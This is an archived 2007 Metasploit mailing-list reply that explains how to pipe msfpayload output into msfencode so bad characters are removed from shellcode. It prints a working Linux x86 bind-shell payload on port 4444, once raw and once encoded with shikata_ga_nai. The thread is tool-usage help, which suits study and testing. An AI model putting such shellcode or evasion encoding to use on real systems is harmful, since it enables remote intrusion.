Metasploit mailing list archives
Building multistage payloaded exploits?
From: hdm at metasploit.com (H D Moore)
Date: Mon, 24 Sep 2007 18:10:10 -0500
You are probably doing something wrong ;-) The msfpayload command only generates the raw shellcode, if you want to encode it, you need to generate it in "raw" mode, then pass it into msfencode, which takes the -b parameter defining the bad character set. For example: $ msfpayload linux/x86/shell_bind_tcp LPORT=4444 C /* * linux/x86/shell_bind_tcp - 78 bytes * http://www.metasploit.com * AppendExit=false, PrependSetresuid=false, * PrependSetuid=false, LPORT=4444, PrependSetreuid=false */ unsigned char buf[] = "\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80" "\x5b\x5e\x52\x68\xff\x02\x11\x5c\x6a\x10\x51\x50\x89\xe1\x6a" "\x66\x58\xcd\x80\x89\x41\x04\xb3\x04\xb0\x66\xcd\x80\x43\xb0" "\x66\xcd\x80\x93\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x68\x2f" "\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0" "\x0b\xcd\x80"; # now, lets remove the 0xcd and 0x80 $ msfpayload linux/x86/shell_bind_tcp LPORT=4444 R | \ msfencode -a x86 -b '\xcd\x80' -t c [*] x86/shikata_ga_nai succeeded, final size 106 unsigned char buf[] = "\xba\x03\x52\xce\x1e\x29\xc9\xd9\xe9\xb1\x14\xd9\x74\x24\xf4" "\x5f\x31\x57\x13\x83\xef\xfc\x03\x57\x0f\xe2\xf6\x63\x15\xe9" "\x1b\xd0\xea\x45\xb1\xd5\x65\x88\xf5\xbc\xb8\xcb\xae\x1e\x11" "\xa4\xaf\x9d\x84\x68\x25\xb2\xf7\xc0\x30\x53\x9d\x86\x1a\x59" "\xe2\xce\xdb\x65\x50\xd4\x6b\x03\x5b\x55\xc8\x7c\x05\x9b\x4e" "\xef\x93\x49\x71\x48\xe9\x0e\xc4\x11\x09\x66\xf9\xce\x9a\x1f" "\x6d\x3e\x3f\x89\x03\xc9\x5c\x19\x88\x40\x43\x2a\x25\x9e\x04" "\x41"; -HD On Monday 24 September 2007 18:02, scotty to hotty wrote:
Thnx hdm for clarifying my research :P. now, i noticed problems when i specify bad characters in metasploit.... it always spits the payload out with the bad characters still in the exploit.... when i use msf2 it works fine but when i use msf3 it keeps everything i specify to get removed. any work arrounds to this problem? or am i doing something wrong?
Current thread:
- Building multistage payloaded exploits? scotty to hotty (Sep 22)
- Building multistage payloaded exploits? H D Moore (Sep 24)
- Building multistage payloaded exploits? scotty to hotty (Sep 24)
- Building multistage payloaded exploits? H D Moore (Sep 24)
- Building multistage payloaded exploits? scotty to hotty (Sep 24)
- Building multistage payloaded exploits? scotty to hotty (Sep 25)
- Building multistage payloaded exploits? scotty to hotty (Sep 24)
- Building multistage payloaded exploits? H D Moore (Sep 24)